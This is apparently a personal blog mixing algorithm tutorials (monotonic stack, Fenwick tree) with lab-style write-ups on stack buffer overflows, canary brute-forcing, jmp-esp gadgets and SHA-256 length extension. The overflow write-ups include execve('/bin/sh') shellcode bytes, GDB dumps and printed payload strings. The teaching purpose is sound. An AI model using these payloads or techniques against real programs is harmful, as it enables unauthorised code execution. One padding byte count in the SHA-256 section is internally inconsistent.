The Aspires

An Introduction to Monotonic Stack

Ex10si0n Yan — Thu, 13 Jun 2024 20:58:11 GMT

A Monotonic Stack, as its name suggests, is a stack where all elements are maintained in a specific order: either ascending, descending, or based on user-defined comparable properties. The characteristic of this data structure is the maintenance of this order, which can save time on certain types of comparisons and improve the efficiency of some algorithms.

An Example

Suppose we push the array [5, 3, 1, 7, 6, 2] into a monotonic descending stack. After the first three elements are pushed, the stack looks like this:

[bottom -> top
[5
[5 3
[5 3 1

The next element, 7, is greater than the top of the stack (1), so the stack is popped until one of the following conditions holds:

Stack is empty
Stack top is greater than the next element (7)

So the stack goes through the following states:

[5 3 1
[5 3
[5
[
[7

Next, 6 is smaller than the top of the stack (7), so it is pushed directly. The same goes for the final element, 2.

[7 6
[7 6 2

The key property of this data structure is that the top of the stack is always an extremum of the elements currently in the stack: the minimum for a descending stack, the maximum for an ascending one.
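
The pushes in the example can be sketched in a few lines of Python. This is only an illustration: push_descending is a name made up here, and the sketch assumes that elements equal to the incoming value are popped as well.

```python
def push_descending(stack, x):
    """Push x, first popping every element that is not greater than x."""
    while stack and stack[-1] <= x:
        stack.pop()
    stack.append(x)


stack = []
for x in [5, 3, 1, 7, 6, 2]:
    push_descending(stack, x)
    print(stack)  # the stack after each push, bottom -> top
```

The last line printed is [7, 6, 2], matching the final state shown above.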

Solving Problems

Here are some problems that you can solve using a monotonic stack. I will explain one of them, the Bad Hair Day. The second one, Trapping Rain Water, is an exercise for you.

POJ 3250 Bad Hair Day

One of the examples is "Bad Hair Day" from USACO 2006 November Silver (this link will redirect you to POJ.org).

POJ 3250 Bad Hair Day Description

$N$ cows stand in a row from left to right, and $h_i$ is the height of cow $i$. Let $c_i$ be the number of cows between cow $i$ and the first cow to its right that is taller than cow $i$ (or the end of the row, if there is no such cow). Determine the value of $\sum\limits_{i=1}^{N} c_i$.

To solve this problem, we can use a monotonic descending stack, accumulating the answer each time the stack pops. Say we have height = [10, 3, 7, 4, 12, 2], the heights of the cows. After pushing two indices (not the elements themselves) into the stack,

[0
[0 1

we meet cow 2 (height of 7), which is taller than the cow on top of the stack. This means the stack-top cow 1 (height of 3) can see 0 cows (index of the cow with height 7 - index of the stack top - 1 = 2 - 1 - 1). So we add this value to the answer (ans += 0) and pop cow 1. We keep popping until the stack is empty or the stack-top cow is taller than 7, and then push cow 2 (height of 7). After that,

[0        ans += (i - stack.top() - 1), stack.pop()
[0 2
[0 2 3

When we meet cow 4 (height of 12), it is again taller than the stack-top cow 3 (height of 4). Cow 3 can then see 0 cows, cow 2 (height of 7) can see 1 cow, and cow 0 (height of 10) can see 3 cows. Let's break it down:

i = 4   # current cow index
top_idx = 3   # top index
c_3 = i - 3 - 1 = 0, then stack.pop(), ans += c_3, top_idx = 2
c_2 = i - 2 - 1 = 1, then stack.pop(), ans += c_2, top_idx = 0
c_0 = i - 0 - 1 = 3, then stack.pop(), ans += c_0, stack empty

Then push cow 4 and cow 5 (heights of 12 and 2) onto the stack,

[4
[4 5

When we reach the right-most cow, we push a sentinel cow of infinite height, so that we can calculate the number of cows that cow 5 and cow 4 can see.

i = 6   # index of the sentinel cow
top_idx = 5
c_5 = i - 5 - 1 = 0, then stack.pop(), ans += c_5, top_idx = 4
c_4 = i - 4 - 1 = 1, then stack.pop(), ans += c_4, stack empty

Pushing the infinite-height cow onto the stack afterwards is optional, since we return the final answer at this point.

The code is shown in the following code block:
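
A minimal Python sketch of the walkthrough above. The function name bad_hair_day is chosen here for illustration, and reading the input in the format POJ expects is left out.

```python
def bad_hair_day(height):
    """Sum, over all cows, of the number of cows each one can see to its right."""
    stack = []  # indices of cows; their heights strictly decrease bottom -> top
    ans = 0
    # A sentinel cow of infinite height at the end flushes the stack.
    for i, h in enumerate(list(height) + [float("inf")]):
        while stack and height[stack[-1]] <= h:
            # Cow i blocks the view of the cow on top of the stack.
            ans += i - stack.pop() - 1
        stack.append(i)
    return ans


print(bad_hair_day([10, 3, 7, 4, 12, 2]))  # 5
```

Each index is pushed and popped at most once, so the whole pass takes $O(N)$ time.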

LeetCode 42 Trapping Rain Water

Another problem is LeetCode 42. You can try solving this problem yourself. The solution code is provided on GitHub Gist, so feel free to explore it.

trap.py

Buffer Overflow Attack from the Ground-up III: Canary

Ex10si0n Yan — Wed, 12 Jun 2024 17:56:22 GMT

In previous sections, we learned about buffer overflow attacks and the methods of injecting shell code. This post will introduce a simple protection mechanism against these attacks, as well as ways to bypass some specific canary protections.

Canary

A canary is a known value (one or more bytes) placed in memory just before the return address. If the canary has been modified when the function returns, the program crashes rather than executing the following instructions. This acts as an integrity check to defend against buffer overflow attacks.

By-passing the Canary

In a buffer overflow attack, the idea is to change memory contents (especially the return address) by supplying carefully constructed input. However, if the canary is the same on every run, it can be easily bypassed because an attacker can brute-force the canary byte by byte.

Say the canary is c4n4, starting at the 129th byte after the start of the input buffer.

Brute Force Canary

We can construct an input of 129 bytes, where the last byte loops over all values from 0 to 255. Since we did not modify the 130th, 131st, and 132nd bytes, there must be a value in the loop that does not make the program crash. This value is ‘c’, and from this, we know that the 129th byte is ‘c’.

The logic is that, for each byte position, exactly one value in the loop does not crash the program, and that value is the canary byte at that position. Repeating this for each position recovers the whole canary.

Once we obtain the canary value, we can easily change the return address without altering the canary. Since we already know the canary value, it can be included in the input string.

The following diagram illustrates this: after we crack the canary, we can change the return address.

The example code is shown in the following code block. The code tries to discover the canary byte by byte. For each byte position, it iterates through all possible byte values (0-255) until it finds the correct one that does not cause the program to crash, indicating the correct canary byte.
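
The idea can be sketched as a self-contained simulation. Nothing here talks to a real process: survives() is a made-up stand-in for "run the program with this input and check whether it crashed", and BUF_SIZE = 128 is an assumption that follows from the canary starting at the 129th byte.

```python
CANARY = b"c4n4"   # secret, known only to the simulated program
BUF_SIZE = 128     # assumed buffer size: the canary starts at byte 129


def survives(payload):
    """Simulated vulnerable program: True if it does not crash.

    Only the canary bytes that the payload reaches are overwritten, so the
    program survives when every overwritten canary byte keeps its value.
    """
    overflow = payload[BUF_SIZE:BUF_SIZE + len(CANARY)]
    return overflow == CANARY[:len(overflow)]


def brute_force_canary(length):
    """Recover the canary one byte at a time, at most 256 tries per byte."""
    known = b""
    for _ in range(length):
        for guess in range(256):
            attempt = b"A" * BUF_SIZE + known + bytes([guess])
            if survives(attempt):
                known += bytes([guess])
                break
    return known


print(brute_force_canary(4))  # b'c4n4'
```

At most 4 × 256 attempts are needed, compared with 256^4 for guessing the whole canary at once.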

Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays

Ex10si0n Yan — Tue, 04 Jun 2024 23:18:41 GMT

Many years ago, I was a beginner in the Olympiad of Informatics. My friend @PremierBob taught me an incredible data structure that impressed me greatly: the Binary Indexed Tree, also known as the Fenwick Tree. It was a sunny afternoon at my high school.

He noticed that I was quite bored, so he decided to come over and talk to me about algorithms. We were both preparing for the OI, so I appreciated it.

He said, “If there is an array and I want to query the sum of a specific range, how would you do that?”

“A for loop,” the thought came to my mind. But he didn’t expect such a simple answer, apparently. “While you are definitely expecting a smarter way to do this, I’d rather know your approach,” I responded.

He started to introduce how integers are stored in a computer.

An Integer in Memory

The way a positive integer is stored in a computer is very straightforward: it is binary. Consider the number 42; its binary representation is 101010. Representing a negative integer is also simple: just take the 2’s complement of the positive number. For example, -42:

42                   : 00101010
1's complement       : 11010101
2's complement (-42) : 11010110

“So the 1’s complement is just bit-wise NOT, and 2’s complement is the 1’s complement plus one?” I asked.

“Definitely!” he said.

“Wait a sec,” I was so confused. “What does this have to do with a range sum query of an array?”

“Binary itself is the key to this approach. Let’s say the numbers from 1 to 16 are the index of an array, agreed?” he continued. “Just forget about 0 for now. If we just want the rightmost 1 (RM1) for these 16 numbers, what will that be?”

i: bin     RM1
1  0000001 0000001
2  0000010 0000010
3  0000011 0000001
4  0000100 0000100
5  0000101 0000001
6  0000110 0000010
7  0000111 0000001
8  0001000 0001000
9  0001001 0000001
10 0001010 0000010
11 0001011 0000001
12 0001100 0000100
13 0001101 0000001
14 0001110 0000010
15 0001111 0000001
16 0010000 0010000

“It is rarer to find the rightmost 1 on the higher digit than on the lower digit,” I responded. “And I know that the way of finding the rightmost 1 is bitwise AND for a number x with its negative value (-x).”

Find the Right Most 1 in a Binary

Simply calculate rm1 = x & -x to get it; see https://stackoverflow.com/questions/31393100/how-to-get-position-of-right-most-set-bit-in-c

“That’s right, and it also follows some patterns. Let’s take a look at the following graph.”

“A red box contains the sum of all blue lines that extend from it,” he said while drawing. “With the nature of numbers, we can define this rule.”

We call the function that finds the rightmost 1 lowbit. The function is defined in code:
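
A minimal Python sketch of lowbit, based on the x & -x trick mentioned above (it assumes x is a positive integer):

```python
def lowbit(x):
    """Return the value of the rightmost set bit of x (x > 0)."""
    return x & -x


for x in (6, 8, 12):
    print(x, bin(x), bin(lowbit(x)))
```

For 6 (110), 8 (1000) and 12 (1100) this prints the RM1 values 10, 1000 and 100 in binary, as in the table above.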

Array c maintains, at index x, the sum of the range that starts at x - lowbit(x) + 1 and ends at x, inclusive.

A code snippet to describe this rule is: c[x] = sum(a[x - lowbit(x) + 1], ..., a[x])

The following figure shows an example of maintaining an array a = [1, 2, 7, 6, 3, 5, 4, 1]. The array c = [1, 3, 7, 16, 3, 8, 4, 29] stores the sum of each of the intervals [[1, 1], [1, 2], [3, 3], [1, 4], [5, 5], [5, 6], [7, 7], [1, 8]], where the interval for index x is [x - lowbit(x) + 1, x].

“That is awesome!” I said. “And you can query the sum of an array by adding these interval sums in c. For example, if I want to calculate the sum of the range [3, 6] inclusive, I just need to determine c[6] + c[4] - c[2], rather than calculate a[3] + a[4] + a[5] + a[6]. For a more extreme example, if I want to calculate the sum of the range [1, 8], I just use c[8].”

“This approach can lower the time complexity of determining the sum of a range from $O(n)$ to $O(\log n)$. But it’s worth mentioning that this approach only supports range arithmetic operations that follow the associative law, such as addition (sum), multiplication (cumulative product), and exclusive OR, aka XOR,” he added.

The Python code for getting the sum of an interval starting from index 1, and of an interval from l to r, is:
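
A minimal sketch of the two queries, using the names get_sum and get_sum_interval. It assumes c is stored 1-indexed, with an unused slot at index 0.

```python
def lowbit(x):
    return x & -x


def get_sum(c, x):
    """Sum of a[1..x], using the 1-indexed interval sums stored in c."""
    total = 0
    while x > 0:
        total += c[x]
        x -= lowbit(x)  # jump to the interval that ends just before this one
    return total


def get_sum_interval(c, l, r):
    """Sum of a[l..r], inclusive."""
    return get_sum(c, r) - get_sum(c, l - 1)


# c from the example above, with an unused slot at index 0
c = [0, 1, 3, 7, 16, 3, 8, 4, 29]
print(get_sum_interval(c, 3, 6))  # 21 = c[6] + c[4] - c[2]
print(get_sum(c, 8))              # 29 = c[8]
```

Each step of the loop clears the rightmost 1 of x, so a query touches at most as many entries of c as x has bits.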

Initializing the tree takes $O(n)$ time. We can use a prefix sum array, sum, to help with the initialization; after that, you can use get_sum or get_sum_interval to query range sums.
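
One way to do this initialization is sketched below. The function name build is made up here, and the prefix sum array is called prefix rather than sum to avoid shadowing Python's built-in.

```python
def lowbit(x):
    return x & -x


def build(a):
    """Build the 1-indexed array c from a 0-indexed list a in O(n) time."""
    n = len(a)
    prefix = [0] * (n + 1)  # prefix[i] = a[0] + ... + a[i - 1]
    for i in range(1, n + 1):
        prefix[i] = prefix[i - 1] + a[i - 1]
    c = [0] * (n + 1)
    for x in range(1, n + 1):
        # c[x] covers positions x - lowbit(x) + 1 .. x (1-indexed)
        c[x] = prefix[x] - prefix[x - lowbit(x)]
    return c


print(build([1, 2, 7, 6, 3, 5, 4, 1]))
# [0, 1, 3, 7, 16, 3, 8, 4, 29]
```

Apart from the unused slot at index 0, the result matches the array c from the figure.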

Prefix Sum Array

A Prefix Sum Array, also known as a cumulative sum array or cumulative frequency array, is an array where each element represents the sum of all elements up to that index in the original array.

For example, given an array arr = [1, 3, 5, 7, 9], its prefix sum array would be [1, 4, 9, 16, 25].

Time Complexity Optimization: Prefix Sum with HashMap

A very cool way of using Prefix Sum with Hash-map is shown in this post. I am going to break down this LeetCode 560 problem to reveal the idea of lowering down the time complexity by adopting Hash-map (or dictionary in Python).

The code is shown as follows:

"That's clear. And what about updating the value at index i in a, like a[i]?" I asked.

"I will introduce that to you next time~".

Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection

Ex10si0n Yan — Mon, 03 Jun 2024 18:47:16 GMT

Gadgets

A ransom note is created by cutting out letters or words from magazines or newspapers and pasting them together to form a message.

Ransom Note, Image from indieground.net

An assembly gadget is quite similar to this technique. A gadget is a small sequence of machine instructions ending with a ret (return) instruction. These gadgets are found in the program’s existing code and are used to execute specific operations. Attackers chain multiple gadgets together to perform complex actions, similar to forming a coherent message from cut-out words in a ransom note.

As an example, a jmp esp gadget can be found in assembly code, such as in <__libc_start_main@plt>, as shown in the following code block.

By extracting the highlighted part, the bytes can be reinterpreted as a different sequence of instructions.

8049131:       e8 aa ff ff ff   call   80490e0 <__libc_start_main@plt>
8049136:       f4               hlt
8049137:       8b 1c 24         mov    (%esp),%ebx
804913a:       c3               ret

The reinterpreted instructions (starting at 0x8049135 and ending at 0x804913a) are:

8049135:       ff f4            push   esp
8049137:       8b 1c 24         mov    (%esp),%ebx
804913a:       c3               ret

Under the 32-bit x86 architecture, push esp pushes the current value of the ESP (Extended Stack Pointer) register onto the stack. The mov (%esp), %ebx instruction is not needed, but it is harmless here. The final ret then pops the value that was just pushed into EIP (the instruction pointer), so the whole gadget is equivalent to jmp esp: execution continues at the address ESP pointed to before the push, and the instructions found there are executed.

Shellcode

A shellcode is a small piece of code used as the payload of an exploit. After it executes, a shell can be spawned for the attacker to interact with. The term “shellcode” comes from its initial purpose of spawning a command shell, but it can be used to perform a variety of tasks, depending on the goals of the attacker.

The code in the previous code block is a shellcode provided by Jean Pascal Pereira. ^[1]

Linux x86 execve("/bin/sh") - 28 bytes: http://0xffe4.org ↩︎

The machine code (inside char shellcode[]) is:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80

Spawn a Shell

It would be very interesting if we could construct an input that overflows the buffer, overwrites the original return address with the address of the gadget (so that the program executes the instructions at the top of the stack), and places shellcode at the top of the stack that will spawn a shell for us, as shown in the following figure.

Stack Diagram

That sounds like a good plan. Let's use GDB to see what happens!

GDB debugging

The input point is shown in section C: the string we entered, 10101234, is stored at 0xffffd66c (indicated by the red "input" label and an arrow), and the return address is at 0xffffd70c (the red and blue double block in section C). Section A shows the gadget and section B shows the original ret value 0x80492d5.

The shellcode is then inserted by user input right after the return address (indicated by the yellow underline). The provided Python code implements this design and saves the output to a file.

The Python program writes a constructed string, which is (some of the characters are invisible):
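
A sketch of such a script, under the assumptions visible in this post: the padding length is the distance between the input address 0xffffd66c and the return address slot 0xffffd70c, the gadget sits at 0x8049135, and the shellcode is the 28-byte sequence listed above. The padding byte and the names build_payload and write_payload are arbitrary choices made here.

```python
import struct

GADGET_ADDR = 0x08049135          # push esp; mov (%esp),%ebx; ret
OFFSET = 0xFFFFD70C - 0xFFFFD66C  # input start -> return address slot (160 bytes)
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
)


def build_payload():
    """Padding up to the return address, the gadget address, then the shellcode."""
    padding = b"0" * OFFSET
    ret = struct.pack("<I", GADGET_ADDR)  # 32-bit little-endian address
    return padding + ret + SHELLCODE


def write_payload(path):
    """Save the payload so that it can be fed to the program as input."""
    with open(path, "wb") as f:
        f.write(build_payload())


print(len(build_payload()))  # 192 = 160 + 4 + 28
```

Calling write_payload with a file name of your choice produces the file that is then fed to the vulnerable program.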

000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000051�Ph//shh/bin����°
                                                            ̀1�@̀

By feeding the file content to the vulnerable program, we gain an interactive shell, and the attacker can act as the current user (the process owner).

Shell Gained

Buffer Overflow Attack from the Ground-up I: Simple Overflow

Ex10si0n Yan — Mon, 03 Jun 2024 01:08:35 GMT

Stack and Heap

When a program is running, it is referred to as a process. Processes occupy a portion of the computer’s memory, where they store their code, data, and other necessary information required for execution.

In the context of memory management, heap and stack refer to different areas of a process’s memory, each with distinct purposes and characteristics:

How the stack works:

The stack is the reserved memory space for a process to execute. When a function is called, a block is reserved on the newest-end of the stack for local variables and some bookkeeping data.

Function Calls: When a function is called, a new block of memory is reserved on top of the stack. This block is used to store the function’s local variables and some additional information needed for the function to work.
Returning from Functions: When the function finishes, its block of memory is no longer needed. This block is freed up and can be reused the next time another function is called.
LIFO Order: The stack follows a last-in, first-out (LIFO) order. This means that the most recently reserved block of memory is always the first one to be freed.
Upside-down: The stack is upside-down, where a higher memory address is older and a lower memory address is newer.

How the heap works:

The heap is memory for dynamic allocation. Unlike the stack, there's no enforced pattern to the allocation and deallocation of blocks from the heap; you can allocate a block at any time and free it at any time. This makes it much more complex to keep track of which parts of the heap are allocated or free at any given time; there are many custom heap allocators available to tune heap performance for different usage patterns ^[1]. In C, heap memory is typically obtained with malloc and released with free.

https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap ↩︎

Stack-based Buffer Overflow

Unlike Python and Java, some of the built-in functions in C do not perform boundary checks when writing data into an array (hence, no extra time cost for array manipulation).

As we mentioned before, local variables (including arrays, which are contiguous blocks of memory that can be accessed via a pointer to the first element) are stored on the stack. When a process is running, the stack grows and shrinks dynamically as functions are called and return. The stack pointer (ESP in x86 or RSP in x86-64) adjusts to allocate and deallocate stack space.

EBP (Extended Base Pointer)

When a function is called, the current value of the stack pointer (ESP) is typically saved in the base pointer (EBP), and the ESP is adjusted to allocate space for the function's stack frame, moving downwards (to lower) in memory.

This allows the function to access its parameters and local variables relative to a fixed reference point, even as the stack pointer changes during the function’s execution.

More explicitly, the space between ESP and EBP contains the local variables and possibly other data for the current function’s execution.

Stack Diagram

The return address is allocated at an important part of the stack. The return address is where the function returns after it is completely executed.

If the function is called by the main function, the return address points to the place in the main function immediately after the call. If calls are nested, such as when an outer function calls an inner function, the return address of the inner function is the place immediately after the call instruction in the outer function, not in the inner function itself. Every call in progress keeps its own frame on the stack, which is why some high-level programming languages impose a maximum recursion depth to prevent excessive allocation of stack space.

Let's take a look at the following example.

The code works like the cat command in Linux, outputting whatever the user inputs. However, a buffer was declared inside the vuln() function without applying a boundary check. This enables attackers to overwrite the stack memory beyond the allocated buffer size.

Given the vuln() function’s buffer overflow vulnerability, an attacker could potentially:

Provide an input longer than 148 characters to overflow buf.
Overwrite the return address of vuln() to point to the win() function’s address.
When vuln() returns, instead of returning to the caller main, it would jump to the win() function, thereby executing the win() function and potentially printing the contents of “flag.txt”.

We need to disassemble the compiled binary so that we can easily find the return address ret. Say the binary is called vuln; the following command prints the assembly code for vuln.

objdump -d ./vuln

The partial assembly code is shown as follows:

The ret address should be 0x8049390, since it is the address of the instruction right after the call to vuln().

Then we use GDB to see what happens when a user enters a string. By setting a GDB breakpoint at 0x80492f4, we can make the process stop at the instruction that reads the user input; stepping over it with nexti lets us inspect memory right after the input is stored. Assuming we enter the nonsense string 1010101012341234, the GDB session looks like this:

(gdb) b *0x80492f4
Breakpoint 1 at 0x80492f4
(gdb) r
Starting program: /afs/andrew.cmu.edu/usr24/zhongboy/private/14741/b1/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Enter a string:

Breakpoint 1, 0x080492f4 in vuln ()
(gdb) nexti
1010101012341234
0x080492f9 in vuln ()

To see what happens inside the memory, use x/64xw $esp, which displays 64 units of memory, formatted as hexadecimal words (4 bytes each), starting from the address in ESP.

(gdb) x/64xw $esp
0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322  0x30313031
0xffffd670:   0x30313031  0x34333231  0x34333231  0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728  0x08049390
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760

As illustrated in the annotated dump, the ASCII codes for the input 1010101012341234 are marked with [...]; each word is shown in little-endian (reversed) order.

Endianness

Endianness refers to the order in which bytes are arranged in memory to represent larger data types (such as integers). There are two primary types of endianness:

Big-endian

In big-endian format, the most significant byte (the “big end”) is stored at the smallest memory address, and the least significant byte is stored at the largest memory address.

Little-endian

In little-endian format, the least significant byte (the “little end”) is stored at the smallest memory address, and the most significant byte is stored at the largest memory address.
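
As a quick check of the byte order, Python's struct module can interpret the first four input characters the way a little-endian x86 machine does. The variable names are chosen here for illustration.

```python
import struct

word = b"1010"                            # first four input characters
as_little = struct.unpack("<I", word)[0]  # how x86 reads these four bytes
as_big = struct.unpack(">I", word)[0]     # the same bytes read as big-endian
print(hex(as_little))  # 0x30313031
print(hex(as_big))     # 0x31303130

# The reverse direction: the bytes that store an address in memory on x86.
ret_bytes = struct.pack("<I", 0x08049390)
print(ret_bytes.hex())  # 90930408
```

The little-endian value 0x30313031 is exactly the first word of the input as it appears in the GDB dump.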

The return address is indicated using (...).

0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 [0x30313031
0xffffd670:   0x30313031  0x34333231  0x34333231] 0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728 (0x08049390)
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760

To overflow the buffer and overwrite the return address, we can construct an input string using Python (the code is shown as follows) to make the memory look like this:

0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 [0x30313031
0xffffd670:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd680:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd690:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6a0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6b0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6c0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6d0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6e0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6f0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd700:   0x31313131  0x31313131  0x31313131 (0x08049256)
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760

The string in binary is: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000V’
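
A sketch of how such a string can be built. It assumes that 0x08049256, the value shown in the overwritten return address slot, is the address of win(), and that the padding length is the distance from the input address 0xffffd66c to the return address slot 0xffffd70c. The padding byte itself is arbitrary, and build_input is a name made up here.

```python
import struct

OFFSET = 0xFFFFD70C - 0xFFFFD66C  # input start -> return address slot (160 bytes)
WIN_ADDR = 0x08049256             # assumed address of win()


def build_input():
    """Fill everything up to the return address, then overwrite it."""
    return b"0" * OFFSET + struct.pack("<I", WIN_ADDR)


evil = build_input()
print(len(evil), evil[-4:])
```

The last four bytes are 56 92 04 08, which is the address written in little-endian order; 0x56 is the visible character V at the end of the string.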

Bingo! When we input this 'evil' string (some characters may not show up) into the program, it will display the content of flag.txt.

An Introduction to SHA256 Hash Extension Attack

Ex10si0n Yan — Wed, 22 May 2024 04:02:43 GMT

TL;DR: A SHA-256 extension attack can create a new hash value for a modified message without knowledge of the original message.

SHA-256 works by taking an input message and processing it through a series of bitwise operations and modular additions to produce a fixed-size (256-bit) output, known as the hash value or digest. This output is typically represented as a 64-character hexadecimal number (each character represents 4 bits, ranging from 0000 to 1111 in binary), used to verify the integrity and authenticity of the input data.

If digital signatures are not used to protect the integrity of the SHA-256 hash value, an attacker can easily append additional data to an existing message (right after the original message and its padding) and generate a new valid hash value for the extended message without needing to know the original message content. This technique is known as a SHA-256 extension attack.

Here is an example: a system manager sends a YAML file with a SHA-256 digest to the server, and the server program can assign users specified in the YAML to the system.

The system is required to verify that the hash value of the received YAML is the same as the hash value from the sender's side in order to ensure integrity.

The system manager sends a YAML file containing:

The corresponding SHA-256 digest for this plain text is:

b3318b395ecbea550974e6558a782971262af8f786af4f01e8f8a2ba18bc1102

Charlie, the man-in-the-middle, can only write bytes to the YAML and read the digest. He can use an extension attack to modify the YAML (without reading it) and the hash to forge a modified YAML and the corresponding hash digest. He can then encapsulate the forged message and send it to the receiver to gain access privileges.

The following YAML has been modified by Charlie; he appends some characters to declare an access privilege, although he cannot see the message.

Charlie can generate the corresponding SHA-256 digest for the new message and then send it to the receiver to deceive them.

a40cf7232a3e7065cbab6d70a76328143b30a519ecca5a626b8b77f3c6c4924e

Charlie successfully exploits the server by modifying both the YAML and the digest with the help of a hash extension attack.

The following paragraphs will introduce you to the technique and implementation for the extension attack.

The SHA-256 Padding Algorithm

Before being fed into the hash algorithm, the message must be padded to a length that is a multiple of 64 bytes. As an example, consider the padding of the message helloworld.

The hexadecimal value (ASCII) for helloworld is

68 65 6c 6c 6f 77 6f 72 6c 64
^  ^  ^  ^  ^  ^  ^  ^  ^  ^
h  e  l  l  o  w  o  r  l  d
length = 10

The first step is to append a 0x80 to the hexadecimal value.

68 65 6c 6c 6f 77 6f 72 6c 64 80

The second step is to append 0x00 bytes until the length equals $n \times 64 - 8$, for the smallest possible $n > 0$.

68 65 6c 6c 6f 77 6f 72 6c 64 80 00 ....... 00
                                 | count: 45 |
length = 56

The final step is to append 8 bytes as the length indicator of the original message ($10$ bytes = $80$ bits = $50_{16}$ bits), stored as a big-endian integer.

68 65 6c 6c 6f 77 6f 72 6c 64 80 00 ....... 00 50
                                 | count: 52 |
length = 64
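
The three steps can be sketched in Python as follows. The function name sha256_pad is made up for illustration.

```python
import struct


def sha256_pad(message):
    """Return message followed by 0x80, zero bytes, and the 8-byte bit length."""
    bit_length = len(message) * 8
    zeros = (55 - len(message)) % 64  # zero bytes needed to reach n * 64 - 8
    return message + b"\x80" + b"\x00" * zeros + struct.pack(">Q", bit_length)


padded = sha256_pad(b"helloworld")
print(len(padded))          # 64
print(padded[10:11].hex())  # 80
print(padded[-1:].hex())    # 50
```

For helloworld this gives 45 zero bytes of padding, followed by the 8-byte length field 00 00 00 00 00 00 00 50.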

SHA-256

The SHA-256 hash is a non-reversible hash function that maintains 8 hash values ([h]), named h0, h1, ... to h7. Each [h] is initialized to a specific value, as illustrated in the figure.

SHA-256

The padded message is then divided into n 64-byte blocks (n=3 in this example, where n depends on the length of the message), named [block1], [block2], and [block3]. The hash algorithm then processes each block sequentially, applying the compression function F to each block and updating the h values.

The code illustrates the compression function F. The final hash value is obtained by concatenating the eight h values after processing all blocks with the compression function. The initial h values are:

h0 = 0x6a09e667
h1 = 0xbb67ae85
h2 = 0x3c6ef372
h3 = 0xa54ff53a
h4 = 0x510e527f
h5 = 0x9b05688c
h6 = 0x1f83d9ab
h7 = 0x5be0cd19

These values go through the F function, and the function updates the h values (block-wise) with the block input, finally outputting the h values. These h values constitute the hash digest.

Merkle–Damgård Length Extension Attack

The Merkle–Damgård length extension attack forges a new message hash that is an extension of the original message. Since the digest is simply the concatenation of the final h values, anyone who knows the digest also knows the internal state of the algorithm after the last block, and can feed those h values back in to continue hashing.

The original message that the system manager sent first goes through the SHA-256 hash algorithm and yields a hash value. This hash value is then used as the initial h values for the extension message ", charlie", which is processed by the SHA-256 hash algorithm to generate the final hash value.

Note that the original message is padded and appended with its length, following the padding algorithm:

name: alice, bob<0x80><0x00>..<0x00>

